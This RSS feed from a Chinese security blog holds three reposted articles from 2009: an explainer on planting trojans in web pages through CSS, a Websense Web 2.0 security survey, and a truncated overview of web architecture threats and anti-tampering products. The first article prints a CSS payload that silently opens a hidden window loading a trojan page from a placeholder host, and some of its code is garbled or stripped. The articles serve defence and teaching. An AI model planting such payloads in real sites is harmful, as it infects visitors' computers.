﻿<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/"><channel><title>BlogJava-xskow's road.-文章分类-Web安全</title><link>http://www.blogjava.net/xskowscut/category/39642.html</link><description>&lt;font size=5&gt;做好自己，做好一切。&lt;/font&gt;</description><language>zh-cn</language><lastBuildDate>Fri, 19 Jun 2009 07:54:13 GMT</lastBuildDate><pubDate>Fri, 19 Jun 2009 07:54:13 GMT</pubDate><ttl>60</ttl><item><title>【转】网络安全：了解网页的CSS挂马及相应防范方法</title><link>http://www.blogjava.net/xskowscut/articles/283169.html</link><dc:creator>xskow!</dc:creator><author>xskow!</author><pubDate>Fri, 19 Jun 2009 01:51:00 GMT</pubDate><guid>http://www.blogjava.net/xskowscut/articles/283169.html</guid><wfw:comment>http://www.blogjava.net/xskowscut/comments/283169.html</wfw:comment><comments>http://www.blogjava.net/xskowscut/articles/283169.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.blogjava.net/xskowscut/comments/commentRss/283169.html</wfw:commentRss><trackback:ping>http://www.blogjava.net/xskowscut/services/trackbacks/283169.html</trackback:ping><description><![CDATA[<p>黑客们发现发现，用来制作网页特效的CSS代码，也可以用来挂马。</p>
<p>随着Web2.0的普及，各种网页特效用得越来越多，这也给黑客一个可乘之机。他们发现，用来制作网页特效的CSS代码，也可以用来挂马。而比较讽刺的是，CSS挂马方式其实是从防范E挂马的CSS代码演变而来。</p>
<p>安天实验室阿楠：安全工程师，从事病毒分析多年。</p>
<p>网站挂马的手段最初非常单一，但是随着Web2.0技术以及Blog、Wiki等广泛的应用，挂马也涌现出各种各样的技术，其中CSS挂马方式，可以说是Web2.0时代黑客的最爱。有许多非常著名的网站都被黑客用CSS挂马入侵过。</p>
<p>在我印象中，记忆最深刻的一次是百度空间CSS挂马。当时，百度空间推出没有多久，就有许多百度用户收到了类似&#8220;哈，节日快乐呀!热烈庆祝2008，心情好好，记住要想我!http://hi.baidu.com/XXXXX&#8221;的站内消息。</p>
<p>由于网址是百度空间的网址，许多用户认为不会存在安全问题，加上又有可能是自己朋友发来的，因此会毫不犹豫地点击进入。但是进入指定的网址后，用户就会感染蠕虫病毒，并继续传播。</p>
<p>由于蠕虫扩散非常严重，最终导致百度空间不得不发布官方声明提醒用户，并且大费周折地在服务器中清除蠕虫的恶意代码。那一次的挂马事件利用的就是百度空间CSS模板功能，通过变形的expression在CSS代码中动态执行脚本，让指定的远程恶意代码文件在后台悄悄运行并发送大量伪造信息。</p>
<p>我建议大家在点击陌生链接时，要多个心眼，大网站也是可能被挂马的。大家在上网时，最好还是使用一些带网页木马拦截功能的安全辅助工具。</p>
<p>黑客为什么选择CSS挂马?</p>
<p>在Web1.0时代，使用E挂马对于黑客而言，与其说是为了更好地实现木马的隐藏，倒不如说是无可奈何的一个选择。在简单的HTML网页和缺乏交互性的网站中，黑客可以利用的手段也非常有限，即使采取了复杂的伪装，也很容易被识破，还不如E来得直接和有效。</p>
<p>但如今交互式的Web2.0网站越来越多，允许用户设置与修改的博客、SNS社区等纷纷出现。这些互动性非常强的社区和博客中，往往会提供丰富的功能，并且会允许用户使用CSS层叠样式表来对网站的网页进行自由的修改，这促使了CSS挂马流行。</p>
<p>小百科：</p>
<p>CSS是层叠样式表(CascadingStyleSheets)的英文缩写。CSS最主要的目的是将文件的结构(用HTML或其他相关语言写的)与文件的显示分隔开来。这个分隔可以让文件的可读性得到加强、文件的结构更加灵活。</p>
<p>黑客在利用CSS挂马时，往往是借着网民对某些大网站的信任，将CSS恶意代码挂到博客或者其他支持CSS的网页中，当网民在访问该网页时恶意代码就会执行。这就如同你去一家知名且证照齐全的大医院看病，你非常信任医院，但是你所看的门诊却已经被庸医外包了下来，并且打着医院的名义利用你的信任成功欺骗了你。但是当你事后去找人算账时，医院此时也往往一脸无辜。对于安全工程师而言，CSS挂马的排查是必备常识。</p>
<p>CSS挂马攻防实录</p>
<p>攻CSS挂马方式较多，但主流的方式是通过有漏洞的博客或者SNS社交网站系统，将恶意的CSS代码写入支持CSS功能的个性化页面中。下面我们以典型的CSS挂马方式为例进行讲解。</p>
<p>方式1：</p>
<p>Body</p>
<p>&#8220;background-image&#8221;在CSS中的主要功能是用来定义页面的背景图片。这是最典型的CSS挂马方式，这段恶意代码主要是通过&#8220;background-image&#8221;配合t代码让网页木马悄悄地在用户的电脑中运行。</p>
<p>那如何将这段CSS恶意代码挂到正常的网页中去呢?黑客可以将生成好的网页木马放到自己指定的位置，然后将该段恶意代码写入挂马网站的网页中，或者挂马网页所调用的CSS文件中。</p>
<p>小百科：</p>
<p>使用Body对象元素，主要是为了让对象不再改变整个网页文档的内容，通过Body对象的控制，可以将内容或者效果控制在指定的大小内，如同使用DIV对象那样精确地设置大小。</p>
<p>方式2：</p>
<p>Body</p>
<p>background-image: url(t:open("<a href="http://www.x.com/muma.htm">http://www.X.com/muma.htm</a>"，"newwindow"，"border="1" Height=0， Width=0， top=1000， center=0， toolbar=no，menubar=no， scrollbars=no，resizable=no，location=no，status=no"))</p>
<p>方式1的CSS挂马技术，在运行时会出现空白的页面，影响网页访问者正常的访问，因此比较容易发现。不过在方式2中的这段代码，使用了t的Open开窗，通过新开一个隐藏的窗口，在后台悄悄地运行新窗口并激活访问网页溢出木马页面，不会影响访问者观看网页内容，因此更加隐蔽。</p>
<p>防网络服务器被挂马，通常会出现防病毒软件告警之类的信息。由于漏洞不断更新，挂马种类时刻都在变换，通过客户端的反映来发现服务器是否被挂马往往疏漏较大。正确的做法是经常检查服务器日志，发现异常信息，经常检查网站代码，使用网页木马检测系统，进行排查。</p>
<p>目前除了使用以前的阻断弹出窗口防范CSS挂马之外，还可以在网页中设置CSS过滤，将CSS过滤掉。不过如果你选择过滤CSS的话，首先需要留意自己的相关网页是否有CSS的内容，因此我们仍然首推用阻断方式来防范CSS。阻断代码如下所示：</p>
<p>emiao1:expression(this.src="about:blank"，this.outerHTML="");</p>
<p>将外域的木马代码的src重写成本地IE404错误页面的地址，这样，外域的t代码不会被下载。不过阻断方式也有天生致命的弱点，弱点的秘密我们将于下次揭晓。 </p>
<br />
转载出处：http://www.cioage.com/art/200906/78221.htm
<img src ="http://www.blogjava.net/xskowscut/aggbug/283169.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.blogjava.net/xskowscut/" target="_blank">xskow!</a> 2009-06-19 09:51 <a href="http://www.blogjava.net/xskowscut/articles/283169.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>【转】Websense发全球Web2.0安全调查报告（自eNet）</title><link>http://www.blogjava.net/xskowscut/articles/279285.html</link><dc:creator>xskow!</dc:creator><author>xskow!</author><pubDate>Sun, 31 May 2009 13:17:00 GMT</pubDate><guid>http://www.blogjava.net/xskowscut/articles/279285.html</guid><wfw:comment>http://www.blogjava.net/xskowscut/comments/279285.html</wfw:comment><comments>http://www.blogjava.net/xskowscut/articles/279285.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.blogjava.net/xskowscut/comments/commentRss/279285.html</wfw:commentRss><trackback:ping>http://www.blogjava.net/xskowscut/services/trackbacks/279285.html</trackback:ping><description><![CDATA[<div class="laiy font_gary"><a href="http://www.enet.com.cn/">http://www.enet.com.cn</a> 2009年05月25日16：20 <script language="JavaScript" src="/i/asource.js" type="text/javascript"></script><a href="http://www.enet.com.cn/" target="_blank"><span class="font_red">eNet硅谷动力</span></a></div>
<script language="JavaScript" src="/i/digest.js" type="text/javascript"></script>
<div class="artintro">【导读】：中国.北京， 2009 年5月25日— Websense发布一项专门针对包括中国在内的10个国家的1300名IT经理所做的全球调查报告，报告内容主要涉及被访对象对Web2.0当前态势的感知，调查其对Web2.0的理解及其企业的Web安全防范层级、准备情况等。</div>
<div class="artTxt" id="artibody">
<p>　　中国。北京， 2009 年5月25日— Websense发布一项专门针对包括中国在内的10个国家的1300名<a class="article" href="http://www.enet.com.cn/mobilecomputing/" target="_blank">IT</a>经理所做的全球调查报告，报告内容主要涉及被访对象对Web2.0当前态势的感知，调查其对Web2.0的理解及其企业的Web安全防范层级、准备情况等。报告显示Web2.0网站和应用以及关注度最高的前100个网站均允许用户生成内容，搜索引擎如Google、Yahoo等，资源类网站如维基百科，新闻网站如CNN、新浪等均有允许用户生成内容的版块。该调查报告主要结果如下： <br />
<br />
　　<strong>Web 2.0是大势所趋</strong> <br />
<br />
　　越来越多的Web2.0应用开始渗透到企业的业务环节中去，这使得Web2.0在工作领域的影响力日渐增大，从目前来看，该趋势仍将不断加强。尽管很多Web2.0服务是专门针对消费者设计研发而非用于商业，但各个行业中已有很多的企业开始运用Web2.0来加强协作、<a class="article" href="http://www.enet.com.cn/enews/" target="_blank">信息</a>交换、流程简化、吸引投资及创收等。具体表现如下： <br />
<br />
　　95%的企业目前允许员工访问Web2.0网站和应用，最常见的是Web邮件、交互式Web应用和维基百科等。 <br />
<br />
　　62%的IT管理者认为Web2.0应用对其业务的开展很有必要。 <br />
<br />
　　<strong>来自各方的IT使用压力</strong> <br />
<br />
　　员工呼吁能够在工作时间访问Web2.0应用，迫使IT部门努力在灵活、安全的访问与防止安全隐患进入间寻求平衡。而对于Web2.0应用的访问需求更多的来自于企业的高层管理人员和业务层员工，而非不认真工作的员工。 <br />
<br />
　　86%的IT管理者认为开放更多类型的Web2.0应用和技术使他们备感压力。 <br />
<br />
　　30%的受访者认为压力来自于主管级和总监级管理层人员 <br />
<br />
　　34%的受访者认为压力主要来自于市场部门 <br />
<br />
　　32%的受访者认为压力主要来自于销售部门 <br />
<br />
　　IT管理者对于其安全状况盲目乐观 <br />
<br />
　　许多企业已开放了Web2.0的网站和应用，但却忽视一个危险的安全漏洞的存在。尽管大多数受访者承认他们没有部署必要的<a class="article" href="http://www.enet.com.cn/ehome/fan/" target="_blank">安全解决方案</a>以防范各种威胁攻击，但仍对其企业的Web安全状况信心十足。不仅如此，大量的受访者不清楚Web2.0的构成以及Web2.0如何对企业的安全构成威胁。 <br />
<br />
　　尽管真实的数字显示他们根本无力防护Web2.0安全威胁，仍有80%的受访者对其企业当前所处的安全状况表示自信。 <br />
<br />
　　68 %的企业没有对Web内容的实时分析 <br />
<br />
　　59 %的企业无法阻止URL重定向 <br />
<br />
　　53%的企业没有安全<a class="article" href="http://www.enet.com.cn/solution/" target="_blank">解决方案</a>来拦截发送僵尸网络的间谍<a class="article" href="http://www.enet.com.cn/software/" target="_blank">软件</a> <br />
<br />
　　52 %的企业没有安全解决方案阻止信赖网站上的恶意代码植入 <br />
<br />
　　45 %的企业没有数据泄露防护（DLP）解决方案来防止机密数据的泄漏、上传至维基百科或博客，登陆到未授权的云计算网站或由于间谍软件、网络钓鱼攻击等而泄漏 <br />
<br />
　　仅9%的企业部署能够防范各种威胁攻击的安全解决方案。 <br />
<br />
　　而与以上结果相对应的是企业在网络使用权限上，所采取的态度统计： <br />
<br />
　　50%的公司允许员工访问与工作无关的网站，如优酷、土豆网等 <br />
<br />
　　78%的公司允许员工访问开心网、校园网等社交服务类网站，用于业务往来 <br />
<br />
　　98%的公司允许员工访问163、新浪及Hotmail、Gmail等邮件<a class="article" href="http://www.enet.com.cn/server/" target="_blank">服务器</a> <br />
<br />
　　88%的公司允许员工访问个性化的网页如QQ空间、MSN Space等 <br />
<br />
　　55%的公司允许员工访问淘宝、卓越、当当等购物网站 <br />
<br />
　　64%的公司允许员工访问维基百科 <br />
<br />
　　57%的公司允许员工访问那些可下载视频的网站如电驴、迅雷等 <br />
<br />
　　72%的公司允许员工访问可下载图片、照片的网站 <br />
<br />
　　53%的公司允许员工访问博客、BBS、聊天室等虚拟空间服务 <br />
<br />
　　67%的公司允许员工访问自动生成网站、家居设计图等的定制服务或云计算服务 <br />
<br />
　　调查结果显示IT管理者们对于Web2.0的构成概念比较混淆：仅有17%的受访者能够清楚辨认调查问卷中提及的Web2.0 <br />
<br />
　　仅有五成的受访者认为维基百科、优酷、Google文档等应用为Web2.0 <br />
<br />
　　47%的受访者表示其公司员工会试图避开Web安全策略，这些受访者还强调新的安全策略必须拥有足够的灵活性以确保日常工作的顺利进行，同时避免网络资源的滥用和安全威胁攻击等。 <br />
<br />
　　Websense安全实验室研究结果显示57%的数据窃取攻击是经由Web而实现。Web2.0允许用户自行生成内容的特性为不法分子提供了一个极佳的病毒传播媒介，不法分子可藉此将攻击代码发送给大量用户。调查中，全球超过90%的企业缺乏防范动态威胁和数据泄漏的必要安全解决方案，消费者需要慎重选择那些可确保个人信息安全的企业。 <br />
<br />
　　<strong>对工作中的Web2.0说 &#8220;Yes！&#8221;</strong> <br />
<br />
　　报告显示世界各地的IT管理者们都在充分利用Web2.0 的优势同时，尽最大可能降低其所带来的风险。当前商务环境中的现实情况是企业已不再简单粗暴的阻止Web2.0应用，员工们不仅希望开放Web2.0应用，还希望能够开放他们喜欢的沟通交流通道。 <br />
<br />
　　Websense营销副总裁兼首席信息官Jim Haskin &#8220;我们得知很多企业需要Web2.0的使用指南并寻求化解Web2.0风险的安全解决方案。出于这个原因，Websense推出了能够帮助IT管理者实现Web2.0安全使用的免费工具。借助业内领先的Web安全网关和前端Web2.0威胁防护和检测机制，Websense是唯一能够使企业放心使用Web2.0的解决方案提供商。&#8221; <br />
<br />
　　<strong>研究方法</strong> <br />
<br />
　　Websense委托独立研究机构Dynamic Markets来对全球范围内1300名IT管理者进行调查，涉及国家和地区包括中国（包括香港）、澳大利亚、加拿大、法国、德国、印度、意大利、美国及英国等。在访问前和访问期间，受访者不知道此项研究是由Websense所委托进行的。受访者所在的企业均拥有250台以上的电脑，他们均具备中层以上的资历，其中32%的受访者为企业的CIO或总监级别，68%的受访者为经理级别。样本中无文职人员或管理级别的IT人员。<a href="http://www.enet.com.cn/"><img height="11" src="http://images.enet.com.cn/end.gif" width="11" align="absMiddle" border="0" target="_blank"  alt="" /></a></p>
<br />
原文出处：<a href="http://www.enet.com.cn/article/2009/0525/A20090525477742.shtml">http://www.enet.com.cn/article/2009/0525/A20090525477742.shtml</a></div>
<img src ="http://www.blogjava.net/xskowscut/aggbug/279285.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.blogjava.net/xskowscut/" target="_blank">xskow!</a> 2009-05-31 21:17 <a href="http://www.blogjava.net/xskowscut/articles/279285.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>【转】Web安全原理与技术分析(组图)(感觉很不错，特来与大家分享)</title><link>http://www.blogjava.net/xskowscut/articles/271231.html</link><dc:creator>xskow!</dc:creator><author>xskow!</author><pubDate>Mon, 18 May 2009 01:35:00 GMT</pubDate><guid>http://www.blogjava.net/xskowscut/articles/271231.html</guid><wfw:comment>http://www.blogjava.net/xskowscut/comments/271231.html</wfw:comment><comments>http://www.blogjava.net/xskowscut/articles/271231.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.blogjava.net/xskowscut/comments/commentRss/271231.html</wfw:commentRss><trackback:ping>http://www.blogjava.net/xskowscut/services/trackbacks/271231.html</trackback:ping><description><![CDATA[51CTO.com独家特稿一、Web安全不仅仅是<a href="http://it.hexun.com/" target="_blank">互联网</a>才需要
<p>&nbsp;</p>
<p>　　Web服务是指采用B/S架构、通过Http协议提供服务的统称，这种结构也称为Web架构，随着Web2.0的发展，出现了数据与服务处理分离、服务与数据分布式等变化，其交互性能也大大增强，也有人叫B/S/D三层结构。互联网能够快速流行得益于Web部署上的简单，开发上简便，Web网页的开发大军迅速超过了以往任何计算机语言的爱好者，普及带来了应用上繁荣。J2EE与.NET的殊途同归，为Web流行扫清了厂家与标准的差异；众望所归，SOA选中Web2.0作为其实现的基本工具之一(使用最广的)，Web架构从互联网走进了企业内部网络，新业务系统的开发，越来越多的系统架构师选择了Web架构，与熟悉它的人如此广泛是分不开的。事实再一次证明了那个经典的理论：简洁的最容易流行。</p>
<p>　　简单与安全好象总有些&#8220;矛盾&#8221;，浏览器可以直接看到页面的Html代码，早期的Web服务设计没有过多的安全考虑，人性本善，技术人员总是相信人都是善良的！但随着Web2.0的广泛使用，Web服务不再只是信息发布，游戏中的装备交易、日常生活中网上购物、政府行政审批、企业资源管理&#8230;信息价值的诱惑，人的贪婪开始显现，不是所有的人都有Web设计者的&#8220;大同&#8221;思想，安全问题日显突出了。</p>
<p>　　2008年网络安全事件统计最多是：SQL注入与&#8220;网页挂马(木马)&#8221;。因为这是&#8220;僵尸&#8221;网络发展新&#8220;会员&#8221;的基本工具，而僵尸网络的经济与政治&#8220;价值&#8221;，这里就不用说了。SQL注入与&#8220;网页挂马&#8221;主要就是针对Web服务的，传统的安全产品(UTM/IPS)都有些力不从心。</p>
<p>　　互联网是个人思想展现的乐园，也是世界级的、虚拟的&#8220;另一个&#8221;社会，既然大家都是虚拟的、带着面具的，要变成现实社会中的真实利益，还需要一些转换才可以兑现，但SOA把Web架构带入企业内部网络，这里的网络世界是&#8220;真实的&#8221;，利益是可以直接兑现的，Web安全问题变得刻不容缓。</p>
<p>　　<strong>二、Web架构原理</strong></p>
<p>　　要保护Web服务，先要了解Web系统架构，下图是Web服务的一般性结构图，适用于互联网上的网站，也适用于企业内网上的Web应用架构：
<center>
<table cellspacing="4" cellpadding="1" align="center" border="0">
    <tbody>
        <tr>
            <td valign="top" align="center"><strong><img height="389" src="http://img.hexun.com/2009-05-07/117454657.jpg" width="580" border="1"  alt="" /></strong></td>
        </tr>
        <tr>
            <td valign="top" align="center"></td>
        </tr>
    </tbody>
</table>
</center>
<center>图<br />
<br />
</center>　　用户使用通用的Web浏览器，通过接入网络(网站的接入则是互联网)连接到Web服务器上。用户发出请求，服务器根据请求的URL的地址连接，找到对应的网页文件，发送给用户，两者对话的&#8220;官方语言&#8221;是Http。网页文件是用文本描述的，HTML/Xml格式，在用户浏览器中有个解释器，把这些文本描述的页面恢复成图文并茂、有声有影的可视页面。
<p>&nbsp;</p>
<p>　　通常情况下，用户要访问的页面都存在Web服务器的某个固定目录下，是一些.html或.xml文件，用户通过页面上的&#8220;超连接&#8221;(其实就是URL地址)可以在网站页面之间&#8220;跳跃&#8221;，这就是静态的网页。后来人们觉得这种方式只能单向地给用户展示信息，信息发布还可以，但让用户做一些比如身份认证、投票选举之类的事情就比较麻烦，由此产生了动态网页的概念；所谓动态就是利用flash、Php、asp、Java等技术在网页中嵌入一些可运行的&#8220;小程序&#8221;，用户浏览器在解释页面时，看到这些小程序就启动运行它。小程序的用法很灵活，可以展示一段动画(如Flash)，也可以在你的PC上生成一个文件，或者接收你输入的一段信息，这样就可以根据你的&#8220;想法&#8221;，对页面进行定制处理，让你每次来到时，看到的是你上次设计好的特有风格，&#8220;贵宾的感觉&#8221;是每个人都喜欢的，更何况虚拟的网络世界中，你不认识的人还对你如此&#8220;敬仰&#8221;，服务得如此体贴&#8230;</p>
<p>　　&#8220;小程序&#8221;的使用让Web服务模式有了&#8220;双向交流&#8221;的能力，Web服务模式也可以象传统软件一样进行各种事务处理，如编辑文件、利息计算、提交表格等，Web架构的适用面大大扩展，Web2.0可以成为SOA架构的实现技术之一，这个&#8220;小程序&#8221;是功不可没的。</p>
<p>　　这些&#8220;小程序&#8221;可以嵌入在页面中，也可以以文件的形式单独存放在Web服务器的目录里，如.asp、.php、jsp文件等，并且可以在开发时指定是在用户端运行，还是在服务器端运行；用户不再能看到这些小程序的源代码，服务的安全性也大大提高。这样功能性的小程序越来越多，形成常用的工具包，单独管理，Web业务开发时，直接使用就可以了，这就是中间件服务器，它实际上是Web服务器处理能力的扩展。</p>
<p>　　静态网页与&#8220;小程序&#8221;都是事前设计好的，一般不经常改动，但网站上很多内容需要经常的更新，如新闻、<a href="http://blog.hexun.com/" target="_blank">博客</a>文章、互动游戏等，这些变动的数据放在静态的程序中显然不适合，传统的办法是数据与程序分离，采用专业的数据库。Web开发者在Web服务器后边增加了一个数据库服务器，这些经常变化的数据存进数据库，可以随时更新。当用户请求页面时，&#8220;小程序&#8221;根据用户要求的页面，涉及到动态数据的地方，利用SQL数据库语言，从数据中读取最新的数据，生成&#8220;完整&#8221;页面，最后送给用户，如股市<a href="http://quote.hexun.com/" target="_blank">行情</a>曲线，就是由一个不断刷新的小程序控制。</p>
<p>　　除了应用数据需要变化，用户的一些状态信息、属性信息也需要临时记录(因为每个用户都是不同的)，而Web服务器本来是不记录这些信息的，只管答复你的要求，&#8220;人一走茶就凉了&#8221;。后来Web技术为了&#8220;友好&#8221;互动，需要&#8220;记住&#8221;用户的访问信息，建立了一些&#8220;新&#8221;的通讯机制：?</p>
<p>　　Cookie：把一些用户的参数，如帐户名、口令等信息存放在客户端的硬盘临时文件中，用户再次访问这个网站时，参数也一同送给服务器，服务器就知道你就是上次来的那个&#8220;家伙&#8221;了?</p>
<p>　　Session：把用户的一些参数信息存在服务器的内存中，或写在服务器的硬盘文件中，用户是不可见的，这样用户用不同电脑访问时的贵宾待遇就同样了，Web服务器总能记住你的&#8220;样子&#8221;，一般情况下，Cookie与Session可以结合使用</p>
<p>　　Cookie在用户端，一般采用加密方式存放就可以了；Session在服务器端，信息集中，被篡改问题将很严重，所以一般放在内存里管理，尽量不存放在硬盘上。</p>
<p>　　到此，我们清楚了，Web服务器上有两种服务用数据要保证&#8220;清白&#8221;，一是页面文件(.html、.xml等)，这里包括动态程序文件(.php、.asp、.jsp等)，一般存在Web服务器的特定目录中，或是中间间服务器上；二是后台的数据库，如Oracle、SQLServer等，其中存放的数据的动态网页生成时需要的，也有业务管理数据、经营数据。</p>
<p>　　还有一个问题应该提一下，就是浏览器给用户电脑带来的安全问题，因为Web可以对本地的进程、硬盘操作，可以把木马、病毒放到你的电脑上来，Web架构中使用&#8220;沙漏&#8221;技术提供安全保护，就是限制页面中&#8220;小程序&#8221;的本地读写权限，但限制毕竟不能不让其&#8220;工作&#8221;，所以多数情况下在写入时给出提示，让你自己选择，大家经常看见有进程在安装程序进入你的电脑，但绝大多数人分不清是否应该，要么一概不许，造成很多事情做不了(很多下载与游戏就只能看着)，要么&#8220;大胆&#8221;接受，大门敞开，听天由命。这里主要分析服务器端的安全，客户端的安全再行考虑。</p>
<p>　　共7页: 1 234567</p>
<p>　　内容导航</p>
<p>　　第 1 页：Web架构原理 第 2 页：Web架构中的安全点分析</p>
<p>　　第 3 页：网页防篡改产品 第 4 页：Web防火墙产品</p>
<p>　　第 5 页：Web数据库审计产品 第 6 页：Web木马检查工具</p>
<p>　　第 7 页：新的想法主机Web网关</p>
<p>　　<!--page--> <strong>三、Web架构中的安全点分析</strong></p>
<p>　　从Web架构上可以看出，Web服务器是必经的大门，进了大门，还有很多服务器需要保护，如中间件服务器、数据库服务器等。我们这里不考虑网络内部人员的攻击，只考虑从接入网(或互联网)来的攻击，入侵者入侵的通道有下面几个：</p>
<p>　　1、服务器系统漏洞：Web服务器毕竟的一个通用的服务器，无论是Windows，还是Linux/Unix，都不可少的带有系统自身的漏洞，通过这些漏洞入侵，可以获得服务器的高级权限，当然对服务器上运行的Web服务就可以随意控制了。除了OS的漏洞，还有Web服务软件的漏洞，IIS也好，Tomcat也好，同样需要不断地打补丁。</p>
<p>　　2、Web服务应用漏洞：如果说系统级的软件漏洞被关注的人太多了，那么Web应用软件的漏洞数量上就更多了，因为Web服务开发简单，开发的团队参差不齐，并非都是&#8220;专业&#8221;的高手，编程不规范、安全意识不强、因为开发时间紧张而简化测试等，应用程序的漏洞也同样可以让入侵者来去自如。最为常见的SQL注入，就是因为大多应用编程过程中产生的漏洞。</p>
<p>　　3、密码暴力破解：漏洞会招来攻击容易理解，但毕竟需要高超的技术水平，破解密码却十分有效，而且简单易行。一般来说帐号信息容易获得，剩下的就是猜测密码了，由于使用复杂密码是件麻烦而又&#8220;讨厌&#8221;的事，设置容易记忆的密码，是绝大多数用户的选择。大多Web服务是靠&#8220;帐号+密码&#8221;的方式管理用户帐户，一旦破解密码，尤其是远程管理者的密码，破坏程度难以想象，并且其攻击难度比通过漏洞方式要简单的多，而且不容易被发觉。在知名的网络经济案例中，通过密码入侵的占了接近一半的比例。</p>
<p>　　<strong>入侵者进入Web系统，其动作行为目的性是十分明确的：</strong></p>
<p>　　?</p>
<p>　　让网站瘫痪：网站瘫痪是让服务中断。使用DDOS攻击都可以让网站瘫痪，但对Web服务内部没有损害，而网络入侵，可以删除文件、停止进程，让Web服务器彻底无法恢复。一般来说，这种做法是索要金钱或恶意竞争的要挟，也可能是显示他的技术高超，拿你的网站被攻击作为宣传他的工具。</p>
<p>　　篡改网页：修改网站的页面显示，是相对比较容易的，也是公众容易知道的攻击效果，对于攻击者来说，没有什么&#8220;实惠&#8221;好处，主要是炫耀自己，当然对于政府等网站，形象问题是很严重的。?</p>
<p>　　挂木马：这种入侵对网站不产生产生直接破坏，而是对访问网站的用户进行攻击，挂木马的最大&#8220;实惠&#8221;是收集僵尸网络的&#8220;肉鸡&#8221;，一个知名网站的首页传播木马的速度是爆炸式的。挂木马容易被网站管理者发觉，XSS(跨站攻击)是新的倾向。?</p>
<p>　　篡改数据：这是最危险的攻击者，篡改网站数据库，或者是动态页面的控制程序，表面上没有什么变化，很不容易发觉，是最常见的经济利益入侵。数据篡改的危害是难以估量的，比如：购物网站可以修改你帐号金额或交易记录，政府审批网站可以修改行政审批结果，企业ERP可以修改销售定单或成交价格&#8230;有人说采用加密协议可以防止入侵，如https协议，这种说法是不准确的。首先Web服务是面向大众的，不可以完全使用加密方式，在企业内部的Web服务上可以采用，但大家都是&#8220;内部人员&#8221;，加密方式是共知的；其次，加密可以防止别人&#8220;窃听&#8221;，但入侵者可以冒充正规用户，一样可以入侵；再者，&#8220;中间人劫持&#8221;同样可以窃听加密的通讯。</p>
<p>　　共7页: 12 3456[7]</p>
<p>　　内容导航</p>
<p>　　第 1 页：Web架构原理 第 2 页：Web架构中的安全点分析</p>
<p>　　第 3 页：网页防篡改产品 第 4 页：Web防火墙产品</p>
<p>　　第 5 页：Web数据库审计产品 第 6 页：Web木马检查工具</p>
<p>　　第 7 页：新的想法主机Web网关</p>
<p>　　<!--page--> <strong>四、Web安全产品分析</strong></p>
<p>　　围绕Web服务的安全，产品可以说五花八门，最基本的是接入网入口的UTM网关，其中IPS功能与防DDOS功能是Web服务器系统级入侵的直接防护，但UTM是通用的边界安全网关，非&#8220;专业的&#8221;Web入侵防护，一般作为安全的入门级防护，这里不细说。这里主要分析专为Web服务开发的安全产品，大概有下面几方面的产品：</p>
<p>　　<strong>1、网页防篡改产品：</strong></p>
<p>　　防护未知攻击是难的，但看好我自己的&#8220;家底&#8221;是相对容易的。因此，人们最先想到的就是网页防篡改技术，保持自己的&#8220;纯洁&#8221;，起码对社会不会造成大危害。网页被篡改产品出现在Web早期，几经风雨，各厂家技术逐渐统一。网页防篡改技术的基本原理：是对Web服务器上的页面文件(目录下文件)进行监控，发现有更改及时恢复。所以该产品实际是一个&#8220;修补&#8221;的工具，不能阻止攻击者的篡改，就来个守株待兔，专人看守，减少损失是目标，防篡改属于典型的被动防护技术。</p>
<p>　　网页防篡改产品的部署：建立一台单独的管理服务器(Web服务器数量少可以省略)，然后在每台Web服务器上安装一个Agent程序，负责该服务器的&#8220;网页文件看护&#8221;，管理服务器是管理这些Agent看护策略的。</p>
<p>　　<strong>我们先分析一下&#8220;页面文件看护&#8221;技术的变迁：</strong><br />
<br />
<center>
<table cellspacing="4" cellpadding="1" align="center" border="0">
    <tbody>
        <tr>
            <td valign="top" align="center"><strong><img height="330" src="http://img.hexun.com/2009-05-07/117454658.jpg" width="580" border="1"  alt="" /></strong></td>
        </tr>
        <tr>
            <td valign="top" align="center"></td>
        </tr>
    </tbody>
</table>
</center>
<center>图<br />
<br />
</center>　　a)第一代技术，把Web服务器主目录下的文件做一个备份，用一个定时循环进程，把备份的文件与服务使用的文件逐个进行比较，不一样的就用备份去覆盖。网站更新发布时，则同时更新主目录与备份。这种方法在网站大的情况下，网页数量巨大，扫描一遍的时间太长，并且对Web服务器性能也是挤占。
<p>&nbsp;</p>
<p>　　b)第二代技术，采用了Hash算法，对主目录下的每个文件做Hash，生成该文件的&#8220;指纹&#8221;，定时循环进程直接计算服务用文件的Hash指纹，然后进行指纹核对，指纹一般比较小，比较方便；指纹具有不可逆的特点，不怕仿制。</p>
<p>　　c)第三代技术，既然网站上页面太多，三级以下页面的访问量，一般使用呈指数级下降，没人访问当然也不会被篡改，在这些页面重复扫描是不划算的。改变一下思路：对文件读取应该没有危险，危险的是对文件的改写操作。若只对文件被改变时才做检查，就可以大大降低对服务器资源的占用；具体做法是：开启一个看守进程，对Web服务器的主目录文件删改操作进行监控，发现有此操作，判断是否有合法身份，是否为授权的维护操作，否则阻断其执行，文件不被改写，也就起到了网页防篡改的目的。这个技术也称为事件触发防篡改。</p>
<p>　　这种技术需要考验对服务器操作系统的熟悉程度，但黑客也是高手，你的看护进程是用户级的，黑客可以获得高级权限，绕过你的&#8220;消息钩子&#8221;，监控就成了摆设。</p>
<p>　　d)第四代技术，既然是比谁的进程权限高，让操作系统干这个活儿，应该是最合适的，黑客再牛也不可能越过操作系统自己&#8220;干活&#8221;。因此，在Windows系统中，提供系统级的目录文件修改看护进程(系统调用)，防篡改产品直接调用就可以了，或者利用操作系统自身的文件安全保护功能，对主目录文件进行锁定(Windows对自己系统的重要文件也采取了类似的防篡改保护，避免病毒的侵扰)，只允许网站发布系统(网页升级更新)才可以修改文件，其他系统进程也不允许删改。</p>
<p>　　这个方法应该说比较彻底，但可以看出，以后防篡改技术将成为操作系统的&#8220;专利&#8221;了，安全厂家实在是不愿意看到的。好在目前Linux还没有支持。</p>
